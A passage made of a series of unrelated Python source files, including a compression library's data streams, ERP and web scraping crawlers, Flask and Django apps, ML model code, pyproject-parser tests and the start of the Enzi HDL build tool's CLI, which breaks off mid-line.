# noqa kedartatwawadi/stanford_compression_library import abc import tempfile import os import typing from core.data_block import DataBlock Symbol = typing.Any class DataStream(abc.ABC): """abstract class to represent a Data Stream The DataStream facilitates the block interface. From the interface standpoint, the two functions which are useful are: - get_block(block_size) -> returns a DataBlock of the given block_size from the stream - write_block(block) -> writes the block of data to the stream The DataStream can act as a stream object for both writing and reading blocks The two more useful sub-classes of the abstract class are FileDataStream and ListDataStream. (see their description for more details) """ @abc.abstractmethod def seek(self, pos: int): """seek a particular position in the data stream""" pass @abc.abstractmethod def get_symbol(self): """returns a symbol from the data stream, returns None if the stream is finished This is an abstract method, and hence needs to be implemented by the subclasses """ pass def get_block(self, block_size: int) -> DataBlock: """returns a block of data (of the given max size) from the stream get_block function tries to return a block of size `block_size`. In case the remaining stream is shorter, a smaller block will be returned Args: block_size (int): the (max) size of the block of data to be returned. 
Returns: DataBlock: """ # NOTE: we implement get_block as a loop over get_symbol function # this is not the most optimal way of imeplemting get_block (as reading a block of data at once might be faster) # TODO: investigate faster ways of directly reading a block data_list = [] for _ in range(block_size): # get next symbol s = self.get_symbol() if s is None: break data_list.append(s) # if data_list is empty, return None to signal the stream is over if not data_list: return None return DataBlock(data_list) @abc.abstractmethod def write_symbol(self, s): """writes the given symbol to the stream The symbol can be appropriately converted to a particular format before writing. This is an abstract method and so, the subclass will have to implement it Args: s (Any): symbol to be written to the stream """ pass def write_block(self, data_block: DataBlock): """write the input block to the stream Args: data_block (DataBlock): block to be written to the stream """ # NOTE: we implement write_block as a loop over write_symbol function # this is not the most optimal way of imeplemting write_block (as writing a block of data at once might be faster) # TODO: investigate faster ways of directly writing a block for s in data_block.data_list: self.write_symbol(s) def __enter__(self): """function executed while opening the context See: https://realpython.com/python-with-statement/. More details in FileDataStream.__enter__ docstring """ return self def __exit__(self, exc_type, exc_value, exc_traceback): """Function executed which exiting the context Note that the arguments exc_type, exc_value, exc_traceback are as required by python for a context """ pass class ListDataStream(DataStream): """ ListDataStream is a wrapper around a list of symbols. It is useful to: - extract data from the list block by block - write data to the list block by block In practice, this class might be used mainly for testing (as usually you would read data from a file.. see FileDataStream for that) """ def __init__(self, input_list: typing.List): """initialize with input_list and reset the stream Args: input_list (List): the list of symbols, around which the class is a wrapper Usage: with ListDataStream(input_list) as ds: block = ds.get_block(block_size=5) # do something with the block """ # assert whether the input_list is indeed a list assert isinstance(input_list, list) self.input_list = input_list # set the position counter self.current_ind = 0 def seek(self, pos: int): """set the current_ind to a particular pos""" assert pos <= len(self.input_list) self.current_ind = pos def get_symbol(self) -> Symbol: """returns the next symbol from the self.input_list""" # retrieve the next symbol if self.current_ind >= len(self.input_list): return None s = self.input_list[self.current_ind] # increment the current_ind counter self.current_ind += 1 return s def write_symbol(self, s: Symbol): """write a symbol to the stream""" assert self.current_ind <= len(self.input_list) # the case where we modify a symbol if self.current_ind < len(self.input_list): self.input_list[self.current_ind] = s else: # case where we append a symbol self.input_list.append(s) class FileDataStream(DataStream): """Abstract class to create a data stream from a File The FileDataStream defines __exit__, __enter__ methods on top of DataStream. These methods handle file obj opening/closing Subclasses (eg: TextDataStream) need to imeplement methods get_symbol, write_symbol to get a functional object. 
""" def __init__(self, file_path: str, permissions="r"): """Initialize the FileDataStream object Args: file_path (str): path of the file to read from/write to permissions (str, optional): Permissions to open the file obj. Use "r" to read, "w" to write to (other pyhton file obj permissions also can be used). Defaults to "r". """ self.file_path = file_path self.permissions = permissions def __enter__(self): """open the file object context based on the permissions specified NOTE: One way of cleanly managing resources in python is using the with statement as shown in the example below. This ensures the resource is released when exiting the context. One way to support allow using with statement is defining __enter__ and __exit__ statements, which allow for executing functions while entering or exiting the context. Reference: https://realpython.com/python-with-statement/ Example: with TextFileDataStream(path, "w") as fds: # get a text block block = fds.get_block(5) """ self.file_obj = open(self.file_path, self.permissions) return self def __exit__(self, exc_type, exc_value, exc_traceback): """close the file object at the end of context please take a look __enter__ docstring for more info. Reference: https://realpython.com/python-with-statement/ """ self.file_obj.close() def seek(self, pos: int): """resets the file object to the beginning""" self.file_obj.seek(pos) class TextFileDataStream(FileDataStream): """FileDataStream to read/write text data""" def get_symbol(self): """get the next character from the text file as we read character data from file by default, the get_symbol function does not need to do anything special conversions Returns: (str, None): the next character, None if we reached the end of stream """ s = self.file_obj.read(1) if not s: return None return s def write_symbol(self, s): """write a character to the text file""" self.file_obj.write(s) class Uint8FileDataStream(FileDataStream): """reads Uint8 numbers written to a file FIXME: need to immplement """ pass ################################# def test_list_data_stream(): """simple testing function to check if list data stream is getting generated correctly""" input_list = list(range(10)) with ListDataStream(input_list) as ds: for i in range(3): block = ds.get_block(block_size=3) assert block.size == 3 block = ds.get_block(block_size=2) assert block.size == 1 block = ds.get_block(block_size=2) assert block is None # try seeking and reading ds.seek(7) block = ds.get_block(block_size=5) assert block.size == 3 assert block.data_list[0] == 7 # try seeking and writing ds.seek(5) ds.write_symbol(-1) block = ds.get_block(block_size=5) assert block.size == 5 assert block.data_list[0] == -1 def test_file_data_stream(): """function to test file data stream""" # create a temporary file with tempfile.TemporaryDirectory() as tmpdirname: temp_file_path = os.path.join(tmpdirname, "tmp_file.txt") # write data to the file data_gt = DataBlock(list("This-is_a_test_file")) with TextFileDataStream(temp_file_path, "w") as fds: fds.write_block(data_gt) # try seeking to correct symbol at pos 4 fds.seek(4) fds.write_symbol("_") # read data from the file with TextFileDataStream(temp_file_path, "r") as fds: block = fds.get_block(block_size=4) assert block.size == 4 # try seeking and reading fds.seek(4) block = fds.get_block(block_size=4) assert block.data_list[0] == "_" lino_book/projects/lydia/tests/dumps/18.12.0/ledger_accountingperiod.py # -*- coding: UTF-8 -*- logger.info("Loading 6 objects to table ledger_accountingperiod...") # fields: id, ref, 
start_date, end_date, state, year, remark loader.save(create_ledger_accountingperiod(1,u'2015-01',date(2015,1,1),date(2015,1,31),'10',1,u'')) loader.save(create_ledger_accountingperiod(2,u'2015-02',date(2015,2,1),date(2015,2,28),'10',1,u'')) loader.save(create_ledger_accountingperiod(3,u'2015-03',date(2015,3,1),date(2015,3,31),'10',1,u'')) loader.save(create_ledger_accountingperiod(4,u'2015-04',date(2015,4,1),date(2015,4,30),'10',1,u'')) loader.save(create_ledger_accountingperiod(5,u'2015-05',date(2015,5,1),date(2015,5,31),'10',1,u'')) loader.save(create_ledger_accountingperiod(6,u'2015-12',date(2015,12,1),date(2015,12,31),'10',1,u'')) loader.flush_deferred_objects() projects/hupun_operator/page/purchase/upload_purchase.py import copy import uuid from pyspider.libs.base_crawl import * from alarm.page.ding_talk import DingTalk from urllib import parse from pyspider.helper.excel import Excel from cookie.model.data import Data as CookieData from hupun_operator.page.common_post import CommonPost from hupun_operator.page.common_get import CommonGet from hupun_operator.page.download_excel_detect import DownloadExcelDetect class UploadPurchase(BaseCrawl): """ 上传商品数据到erp 的采购订单 """ PATH = '/dorado/uploader/fileupload' # 文件名 upload_name = '采购快速导入文件.xls' # 这个是上传表格的时候用到的(好像必须是这个ID,要不然会报错) CM = 'D1E338D6015630E3AFF2440F3CBBAFAD' def __init__(self, data, storage_uid, storage_name): super(UploadPurchase, self).__init__() self.__data = copy.deepcopy(data) self.__storage_name = storage_name self.__storage_uid = storage_uid def crawl_builder(self): excel = self.get_excel() # TODO 商品数据的组装改成真实的数据 for _d in self.__data.get('list'): excel.add_data(self.value_to_erp(_d)) return CrawlBuilder() \ .set_url('{}{}'.format(config.get('hupun', 'service_host'), self.PATH)) \ .set_upload_files_kv('file', ('file.xlsx', excel.execute())) \ .set_task_id(md5string(uuid.uuid4())) \ .set_cookies(CookieData.get(CookieData.CONST_PLATFORM_HUPUN, CookieData.CONST_USER_HUPUN[0][0])) \ .set_post_data_kv('storageUid', self.__storage_uid) \ .set_post_data_kv('storageName', self.__storage_name) \ .set_post_data_kv('name', self.upload_name) \ .set_post_data_kv('exec', 'importBillB') \ .set_post_data_kv('cm', self.CM) \ .set_post_data_kv('op', 'op') \ .set_post_data_kv('sn', 'sn') \ .set_post_data_kv('tk', 'tk') \ .set_post_data_kv('checkType', 'all') \ .set_post_data_kv('remark', self.__data.get('list')[0].get('remark')) \ .set_post_data_kv('_fileResolver', 'uploadInterceptor#process') \ .set_kwargs_kv('validate_cert', False) def parse_response(self, response, task): result = parse.unquote(response.text).strip('"').split('|') status = 0 print(result) # 如果有html类型的错误地址,说明整个表格导入都失败了 if result[2]: doc = CommonGet(result[2]).get_result() status = 1 error_msg = doc.replace(' ', '').replace('\n', '') msg = error_msg print('导入错误: ', msg) else: # 获取当前数据导入的结果(导入结果只能是导入成功后,通过这个查询接口拿) import_result = CommonPost(CommonPost.IMPORT_PURCHASE_RESULT).get_result() bill_code = import_result.get('data')[0].get('billCode') print('导入结果: ', import_result) print('导入结果的 bill_code: ', bill_code) # 获取当前数据导入的错误excel的key import_err_k = CommonPost(CommonPost.IMPORT_PURCHASE_ERROR_K).get_result() print('错误excel的key: ', import_err_k) # 根据错误excel的key下载excel err_result = DownloadExcelDetect(import_err_k['data']['msg']).get_result() error_msg = err_result[0].get('error', '') if err_result else '' print('错误数据: ', err_result) print('错误数据error_msg: ', error_msg) # 返回错误数据 if error_msg: status = 1 msg = error_msg + ';bill:{}'.format(bill_code) else: msg = import_result return 
status, msg def value_to_erp(self, data): """ 把数据转为erp上传的对应字段 :param data: :return: """ the_list = { 'sku': data.get('skuBarcode', ''), # 'goods_name': data.get('goods_name', ''), 'count': data.get('purchaseCount', ''), 'price': data.get('price', ''), 'supplier': data.get('supplierName', ''), 'arrivalDate': data.get('arrivalDate', ''), } return the_list def get_excel(self): """ 定义表头及字段名 :return: """ return Excel() \ .add_header('sku', '商品编码') \ .add_header('sku', '商品条码') \ .add_header('goods_name', '商品名称') \ .add_header('NONE', '规格名称') \ .add_header('count', '<必填>采购数量') \ .add_header('NONE', '单位') \ .add_header('price', '<必填>单价') \ .add_header('NONE', '折扣率(%)') \ .add_header('cycle', '采购周期') \ .add_header('arrivalDate', '到货日期') \ .add_header('NONE', '商品备注') \ .add_header('supplier', '供应商') \ .add_header('salesman', '业务员账号') \ .add_header('NONE', '结算方式') start_message = """Added this *chat_id* to list of getters ip change info. For more commands use /help""" help_message = """All available commands: - /help - get help. - /start - start command, adds chat_id to list of getters ip change info - /getip - gets current ip - /getconfig - gets config [in progress] """ def send_ip(ip): return "Ip is " + ip def send_ip_change(ip): return "Ip changed. New is: " + ip def send_config(json): return """Config in JSON format: ``` """ + json + """```""" # 3rd party import pytest from coincidence.regressions import AdvancedFileRegressionFixture from domdf_python_tools.paths import PathPlus from pyproject_examples.example_configs import COMPLETE_A, COMPLETE_A_WITH_FILES, COMPLETE_B, COMPLETE_PROJECT_A # this package from pyproject_parser import PyProject UNORDERED = """\ [project] keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] version = "2021.0.0" description = "A simple Python wheel builder for simple projects." dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] name = "whey" [build-system] requires = [ "whey",] build-backend = "whey" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" [[project.authors]] email = "" name = "" """ DUMPS_README_TEMPLATE = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "Whey" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." 
keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] {readme_block} [[project.authors]] email = "" name = "" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" """ COMPLETE_UNDERSCORE_NAME = """\ [build-system] requires = [ "whey",] build-backend = "whey" [project] name = "toctree_plus" version = "2021.0.0" description = "A simple Python wheel builder for simple projects." keywords = [ "pep517", "pep621", "build", "sdist", "wheel", "packaging", "distribution",] dynamic = [ "classifiers", "requires-python",] dependencies = [ "httpx", "gidgethub[httpx]>4.0.0", "django>2.1; os_name != 'nt'", "django>2.0; os_name == 'nt'" ] [[project.authors]] email = "" name = "" [project.urls] Homepage = "https://whey.readthedocs.io/en/latest" Documentation = "https://whey.readthedocs.io/en/latest" "Issue Tracker" = "https://github.com/repo-helper/whey/issues" "Source Code" = "https://github.com/repo-helper/whey" [tool.whey] base-classifiers = [ "Development Status :: 4 - Beta",] python-versions = [ "3.6", "3.7", "3.8", "3.9", "3.10",] python-implementations = [ "CPython", "PyPy",] platforms = [ "Windows", "macOS", "Linux",] license-key = "MIT" package = "whey" """ @pytest.mark.parametrize( "toml_string", [ pytest.param(COMPLETE_A, id="COMPLETE_A"), pytest.param(COMPLETE_B, id="COMPLETE_B"), pytest.param(COMPLETE_PROJECT_A, id="COMPLETE_PROJECT_A"), ] ) def test_dumps( tmp_pathplus: PathPlus, toml_string: str, advanced_file_regression: AdvancedFileRegressionFixture, ): (tmp_pathplus / "pyproject.toml").write_clean(toml_string) config = PyProject.load(filename=tmp_pathplus / "pyproject.toml") config.dump(tmp_pathplus / "pyproject.toml") advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml") advanced_file_regression.check(config.dumps(), extension=".toml") def _param(readme_block: str, **kwargs): return pytest.param(DUMPS_README_TEMPLATE.format(readme_block=readme_block), **kwargs) @pytest.mark.parametrize( "toml_string", [ _param(readme_block="readme = 'README.rst'", id="string"), _param( readme_block="[project.readme]\ntext = 'This is the README'\ncontent-type = 'text/x-rst'", id="dict_text" ), _param( readme_block="[project.readme]\nfile = 'README.rst'\ncontent-type = 'text/x-rst'", id="dict_file" ), ] ) def test_dumps_readme( tmp_pathplus: PathPlus, toml_string: str, advanced_file_regression: AdvancedFileRegressionFixture, ): (tmp_pathplus / "pyproject.toml").write_clean(toml_string) (tmp_pathplus / "README.rst").write_clean("This is the README") config = PyProject.load(filename=tmp_pathplus / "pyproject.toml") config.dump(tmp_pathplus / "pyproject.toml") advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml") advanced_file_regression.check(config.dumps(), extension=".toml") @pytest.mark.parametrize( "toml_string", [ pytest.param(COMPLETE_A, id="COMPLETE_A"), pytest.param(COMPLETE_A_WITH_FILES, id="COMPLETE_A_WITH_FILES"), pytest.param(COMPLETE_B, id="COMPLETE_B"), pytest.param(COMPLETE_PROJECT_A, id="COMPLETE_PROJECT_A"), pytest.param(UNORDERED, id="UNORDERED"), pytest.param(COMPLETE_UNDERSCORE_NAME, id="COMPLETE_UNDERSCORE_NAME"), ] ) def test_reformat( tmp_pathplus: PathPlus, toml_string: str, 
        advanced_file_regression: AdvancedFileRegressionFixture,
):
    (tmp_pathplus / "pyproject.toml").write_clean(toml_string)
    (tmp_pathplus / "README.rst").write_clean("This is the README")
    (tmp_pathplus / "LICENSE").write_clean("This is the LICENSE")

    PyProject.reformat(tmp_pathplus / "pyproject.toml")
    advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml")

    # Should be no changes
    PyProject.reformat(tmp_pathplus / "pyproject.toml")
    advanced_file_regression.check_file(tmp_pathplus / "pyproject.toml")

# Python - 3.6.0
include = lambda arr, item: item in arr

import re

a = "> (1)()"
b = re.compile(r"> \((\d+)\)\(([\w|\W]*)\)")
c = b.match(a)
d, f = c.groups()
print(d, f)

a = 'pid 17240\r\n'
b = re.compile(r"pid (\d+)\r\n")
c = b.match(a)
print(c.groups())

import pandas as pd
from sklearn.preprocessing import LabelEncoder
from flask import Flask, request, render_template

app = Flask(__name__)


@app.route("/")
def index():
    dataset = pd.read_csv('Purpose-of-Visit-by-Port-and-Country-JTB-Open-data-request.csv')
    dataset.drop('Number of Visitors', inplace=True, axis=1)
    dataset = dataset.dropna()

    le = LabelEncoder()

    le.fit(dataset.loc[:, ('Port of Entry')])
    dataset.loc[:, ('Port of Entry')] = le.transform(dataset.loc[:, ('Port of Entry')])
    portEntry = dataset['Port of Entry'].unique()
    portEntryName = le.inverse_transform(portEntry)
    zipbObj = zip(portEntryName, portEntry)
    portEntryDict = dict(zipbObj)

    le.fit(dataset.loc[:, ('Type of Visit')])
    dataset.loc[:, ('Type of Visit')] = le.transform(dataset.loc[:, ('Type of Visit')])
    visitType = dataset['Type of Visit'].unique()
    visitTypeName = le.inverse_transform(visitType)
    zipbObj = zip(visitTypeName, visitType)
    visitTypeDict = dict(zipbObj)

    le.fit(dataset.loc[:, ('Origin')])
    dataset.loc[:, ('Origin')] = le.transform(dataset.loc[:, ('Origin')])
    origin = dataset['Origin'].unique()
    originName = le.inverse_transform(origin)
    zipbObj = zip(originName, origin)
    originDict = dict(zipbObj)

    le.fit(dataset.loc[:, ('Month')])
    dataset.loc[:, ('Month')] = le.transform(dataset.loc[:, ('Month')])
    month = dataset['Month'].unique()
    monthName = le.inverse_transform(month)
    zipbObj = zip(monthName, month)
    monthDict = dict(zipbObj)

    return render_template('index.html', dict1=portEntryDict, dict2=visitTypeDict,
                           dict3=originDict, dict4=monthDict)


@app.route("/predictedVisitor", methods=['POST'])
def predict():
    from joblib import load

    with open('model.pkl', 'rb') as file:
        model = load(file)

    portEntry = request.form['portEntry']
    visitType = request.form['visitType']
    origin = request.form['origin']
    month = request.form['month']

    # avoid shadowing the built-in `input` and this view function's own name
    input_data = [[portEntry, visitType, origin, month]]
    prediction = model.predict(input_data)
    return render_template('results.html', predictData=prediction)


if __name__ == "__main__":
    app.run()

#!/usr/bin/env python
# coding=utf-8
"""
Ant Group
Copyright (c) 2004-2020 All Rights Reserved.
------------------------------------------------------ File Name : softmax Author : Email: Create Time : 2020-12-01 14:17 Description : description what the main function of this file """ from stensorflow.basic.basic_class.pair import SharedPair import tensorflow as tf from stensorflow.exception.exception import StfTypeException from stensorflow.basic.operator.relu import relu from stensorflow.basic.operator.sigmoid import sin2pi import numpy as np from stensorflow.global_var import StfConfig from stensorflow.basic.basic_class.private import PrivateTensor from typing import Union def softmax_bak(x: Union[SharedPair, PrivateTensor]): if isinstance(x, SharedPair): y = relu(x) # + x.ones_like() z = y.reduce_sum(axis=1, keepdims=True) # return ~ (sin2pi(z, T=2**41)*(2**40/np.pi)) * y # return ~sin2pi(z, T=2 ** 14) * y / (2 ** 13 / np.pi) return y / z elif isinstance(x, PrivateTensor): with tf.device(x.owner): y = tf.nn.softmax(x.to_tf_tensor()) y = tf.cast(y * (2 ** x.fixedpoint), 'int64') z = PrivateTensor(owner=x.owner, fixedpoint=x.fixedpoint, inner_value=y, module=x.module, op_map=x.op_map) return z else: raise StfTypeException("x", "SharedPair or PrivateTensor", type(x)) def softmax(x: Union[SharedPair, PrivateTensor]): if isinstance(x, SharedPair): # x = x - x.reduce_sum(axis=-1, keepdims=True) # x = StfConfig.softmax_iter_num * sin2pi(x, T=StfConfig.softmax_iter_num*4) y = x.ones_like() / x.shape[-1] for _ in range(StfConfig.softmax_iter_num): # formula of # y = y + (x - (y * x).reduce_sum(axis=-1, keepdims=True)) * y / StfConfig.softmax_iter_num y = y + (x - (y.expend_dims(axis=[-2]) @ x.expend_dims(axis=-1)).squeeze(axis=-1)) * y / StfConfig.softmax_iter_num return y elif isinstance(x, PrivateTensor): with tf.device(x.owner): y = tf.nn.softmax(x.to_tf_tensor()) y = tf.cast(y * (2 ** x.fixedpoint), 'int64') z = PrivateTensor(owner=x.owner, fixedpoint=x.fixedpoint, inner_value=y, module=x.module, op_map=x.op_map) return z else: raise StfTypeException("x", "SharedPair or PrivateTensor", type(x)) from django.views.generic.edit import CreateView from django.contrib import messages from django.urls import reverse_lazy from django.utils.translation import gettext as _ from .forms import ContactForm from .models import ContactsList class ContactFormView(CreateView): template_name = "contact/contact.html" form_class = ContactForm success_url = reverse_lazy("index") def get_context_data(self, **kwargs): context = super(ContactFormView, self).get_context_data(**kwargs) context["contacts"] = ContactsList.objects.all() return context def form_valid(self, form): if form.send_email(): messages.success(self.request, _("Message sent")) else: messages.error(self.request, _("Message not sent, please try again later.")) return super().form_valid(form) ifding/dynamic-analysis-firmware """ Main model of WaveNet Calculate loss and optimizing """ import os import torch import torch.optim import torch.nn.functional as F from torch.autograd import Variable from warpctc_pytorch import CTCLoss from model.networks import WaveNet as WaveNetModule class WaveNet: def __init__(self, layer_size, stack_size, in_channels, res_channels, lr=0.002): self.net = WaveNetModule(layer_size, stack_size, in_channels, res_channels) self.in_channels = in_channels self.receptive_fields = self.net.receptive_fields self.lr = lr self.loss = self._loss() self.optimizer = self._optimizer() self.criterion = CTCLoss() self._prepare_for_gpu() @staticmethod def _loss(): loss = torch.nn.CrossEntropyLoss() if torch.cuda.is_available(): loss = 
loss.cuda() return loss def _optimizer(self): return torch.optim.Adam(self.net.parameters(), lr=self.lr) def _prepare_for_gpu(self): #if torch.cuda.device_count() > 1: # print("{0} GPUs are detected.".format(torch.cuda.device_count())) # self.net = torch.nn.DataParallel(self.net) if torch.cuda.is_available(): self.net.cuda() def train(self, inputs, targets, input_percentages, target_sizes): """ Train 1 time :param inputs: Tensor[batch, timestep, channels] :param targets: Torch tensor [batch, timestep, channels] :return: float loss """ inputs = Variable(inputs, requires_grad=False) target_sizes = Variable(target_sizes, requires_grad=False) targets = Variable(targets, requires_grad=False) if torch.cuda.is_available(): inputs = inputs.cuda() inputs = torch.squeeze(inputs) outputs = self.net(inputs) outputs = outputs.transpose(0, 1) # TxNxH seq_length = outputs.size(0) sizes = Variable(input_percentages.mul_(int(seq_length)).int(), requires_grad=False) loss = self.criterion(outputs, targets, sizes, target_sizes) loss = loss / inputs.size(0) # average the loss by minibatch loss_sum = loss.data.sum() inf = float("inf") if loss_sum == inf or loss_sum == -inf: print("WARNING: received an inf loss, setting loss value to 0") loss_value = 0 else: loss_value = loss.item() self.optimizer.zero_grad() loss.backward() self.optimizer.step() #if torch.cuda.is_available(): # torch.cuda.synchronize() return loss_value def _train(self, inputs, targets): """ Train 1 time :param inputs: Tensor[batch, timestep, channels] :param targets: Torch tensor [batch, timestep, channels] :return: float loss """ outputs = self.net(inputs) loss = self.loss(outputs.view(-1, self.in_channels), targets.long().view(-1)) self.optimizer.zero_grad() loss.backward() self.optimizer.step() return loss.data[0] def generate(self, inputs): """ Generate 1 time :param inputs: Tensor[batch, timestep, channels] :return: Tensor[batch, timestep, channels] """ if torch.cuda.is_available(): inputs = inputs.cuda() inputs = torch.squeeze(inputs) outputs = self.net(inputs) return outputs @staticmethod def get_model_path(model_dir, step=0): basename = 'wavenet' if step: return os.path.join(model_dir, '{0}_{1}.pkl'.format(basename, step)) else: return os.path.join(model_dir, '{0}.pkl'.format(basename)) def load(self, model_dir, step=0): """ Load pre-trained model :param model_dir: :param step: :return: """ print("Loading model from {0}".format(model_dir)) model_path = self.get_model_path(model_dir, step) self.net.load_state_dict(torch.load(model_path)) def save(self, model_dir, step=0): print("Saving model into {0}".format(model_dir)) model_path = self.get_model_path(model_dir, step) torch.save(self.net.state_dict(), model_path) ############################################### # Import Dependencies ############################################### from flask import Flask, render_template, redirect from flask_pymongo import PyMongo import scrape_mars ############################################### # Flask Setup ############################################### # create an app app = Flask(__name__) ############################################### # Database Setup ############################################### # Use flask_pymongo to set up mongo connection app.config["MONGO_URI"] = "mongodb://localhost:27017/mars_db" mongo = PyMongo(app) ############################################### # Flask Routes ############################################### #define endpoints @app.route("/") def index(): mars_facts = mongo.db.mars_facts.find_one() return 
render_template("index.html", mars_facts=mars_facts) @app.route("/scrape") def scraper(): mars_facts = mongo.db.mars_facts scrape_mars_list = scrape_mars.scrape() mars_facts.update({}, scrape_mars_list, upsert=True) return redirect("/", code=302) ############################################### # Run the Flask Application ############################################### if __name__ == "__main__": app.run(debug=True)enzi/app.py # -*- coding: utf-8 -*- import argparse import datetime import io import logging import os import pprint import re import shutil import sys import toml import colorama from colorama import Fore, Style from enzi.validator import EnziConfigValidator, VersionValidator from enzi.config import validate_git_repo, RawConfig from enzi.git import Git from enzi.file_manager import IncDirsResolver from enzi.project_manager import ProjectFiles from enzi.utils import rmtree_onerror, OptionalAction, BASE_ESTRING from enzi.frontend import Enzi # **************** LOGGING CONFIGURATION **************** # try: import coloredlogs except Exception: coloredlogs = None # logging LOG_FMT = '%(asctime)s %(name)s[%(process)d] %(levelname)s %(message)s' logging.basicConfig(format=LOG_FMT) logger = logging.getLogger('Enzi') # HDL source code file SUFFIXES HDL_SUFFIXES = {'vhd', 'vhdl', 'v', 'vh', 'sv', 'svh', 'tcl', 'xdc', 'xci'} HDL_SUFFIXES_TUPLE = tuple(HDL_SUFFIXES) # auto commit message for enzi update --git -m AUTO_COMMIT_MESSAGE = 'Auto commit by Enzi' # REGEX for matching PKG_SECTION_RE = re.compile(r'\[\s*package\s*\]') VERISON_FIELD_RE = re.compile(r'^\s*version\s*=\s*"(?P(.*))"') class ProjectInitialor(object): """ Initialize a enzi project with a given package name. If the package name directory is already exists, its reject to create the package directory. 
""" def __init__(self, package_name, *, cwd=None): if cwd is None: cwd = os.getcwd() self.path = os.path.join(cwd, package_name) self.name = package_name self.git = Git(self.path) def init(self): self.init_package() self.init_git() def init_package(self): """Initialize the package directory, generate the Enzi.toml, and also create a src sub directory.""" # create the package directory if os.path.exists(self.path): msg = 'path "{}" already existed, init aborted'.format(self.path) logger.error(msg) raise SystemExit(BASE_ESTRING + msg) os.makedirs(self.path) # create the src sub directory os.makedirs(os.path.join(self.path, 'src')) # get git config user.name default_author = self.git.spawn_with( lambda x: x.arg('config').arg('user.name')).strip() # create the Enzi.toml enzi_toml = os.path.join(self.path, 'Enzi.toml') f = io.FileIO(enzi_toml, 'w') writer = io.BufferedWriter(f) sio = EnziConfigValidator.base_file(self.name, default_author) file_content = sio.getvalue() writer.write(file_content.encode('utf-8')) writer.close() def init_git(self): """Initialize the git repository in the package directory""" self.git.spawn_with(lambda x: x.arg('init')) self.git.add_files('Enzi.toml') # add .gitignore gitignore = os.path.join(self.path, '.gitignore') with open(gitignore, 'w') as f: f.write('# ignore Enzi build directory\n') f.write('build/\n') self.git.add_files('.gitignore') class EnziApp(object): """ Enzi Cli Application """ __tasks__ = {'clean', 'update'} __targets__ = {'build', 'sim', 'run', 'program_device'} def __init__(self): (self.args, self.parser) = EnziApp.parse_args() self.enzi = None self.init() def update_args(self, args): """update the args that use in running this app""" self.args = self.parser.parse_args(args) def init(self): """initialize this app""" self.init_logger() def run(self): """run this app""" # if user want to run enzi config help if self.args.enzi_config_help: self.enzi_config_help() return # tasks args = self.args if args.enzi_config_help: self.enzi_config_help() return is_task = hasattr(args, 'task') # check if this run is task # clean up enzi workspace if is_task and args.task == 'clean': self.clean() return if is_task and args.task == 'init': self.init_package() return if is_task and args.task == 'check': self.check_package() return # a root must be specified if not running {'clean', 'init', 'check'} if not args.root: raise RuntimeError('No root directory specified.') # if update, root must be specified if args.config: if os.path.dirname(args.config): fmt = 'flag config {} should only be a filename, not a path of the file' msg = fmt.format(args.config) self.error(msg) raise SystemExit(1) self.enzi = Enzi( args.root[0], args.config, non_lazy=self.args.non_lazy) else: self.enzi = Enzi(args.root[0], non_lazy=self.args.non_lazy) if is_task and args.task == 'update': if args.version: # --version self.update_version() elif args.git: # -- git self.update_git() else: # enzi update without flags self.update_deps() return # targets self.run_target() def run_target(self, **kwargs): """ run Enzi target """ enzi = kwargs.get('enzi', self.enzi) target = self.args.target if target is None: return self.info('start `{}`'.format(target)) # init the enzi frontend enzi.init() enzi.silence_mode = self.args.silence_mode # if we set --gui flag for this target use_gui = hasattr(self.args, 'gui') and self.args.gui enzi.gui_mode = use_gui # get target filesets project_manager = ProjectFiles(enzi) project_manager.fetch(target) fileset = project_manager.get_fileset(target) # run target 
enzi.run_target(target, fileset, self.args.tool) self.info('`{}` done'.format(target)) def init_logger(self): """ get properly log warnning and log error function """ if self.args.log_level: log_level = getattr(logging, self.args.log_level) if coloredlogs: coloredlogs.install(level=log_level, fmt=LOG_FMT) else: logging.basicConfig(level=log_level) ch = logging.StreamHandler() formatter = logging.Formatter(LOG_FMT) ch.setFormatter(formatter) elif coloredlogs: coloredlogs.install(level='INFO', fmt=LOG_FMT) if coloredlogs: effective_level = coloredlogs.get_level() else: effective_level = logger.getEffectiveLevel() # make sure warning and error display at any effective level if effective_level > logging.WARNING: self.warning = logger.critical else: self.warning = logger.warning if effective_level > logging.ERROR: self.error = logger.critical else: self.error = logger.error self.info = logger.info self.debug = logger.debug self.exception = logger.exception self.critical = logger.critical def init_package(self): """Initialize an Enzi Package/Project""" package_name = self.args.name if package_name is None: msg = 'an package name must provide for enzi init' logging.error(msg) raise SystemExit(BASE_ESTRING + msg) initializer = ProjectInitialor(package_name) initializer.init() def check_package(self): manifest_only = self.args.manifest root = self.args.root config_name = self.args.config config_name = config_name if config_name else 'Enzi.toml' if os.path.dirname(config_name): fmt = 'flag config {} should only be a filename, not a path of the file' self.error(fmt.format(config_name)) raise SystemExit() config_path = os.path.join(root, config_name) # check the Enzi.toml try: config = RawConfig(config_path).validate() except Exception: self.error('{} is invalid'.format(config_path)) raise SystemExit(1) if manifest_only: return # check filesets try: config.check_filesets() except Exception: raise SystemExit(1) # check unlisted(in filesets section) files in this package is_git_repo = validate_git_repo('', root, True) if is_git_repo: git = Git(root) untracked = git.list_untracked() ufilter = filter(lambda x: x.endswith( 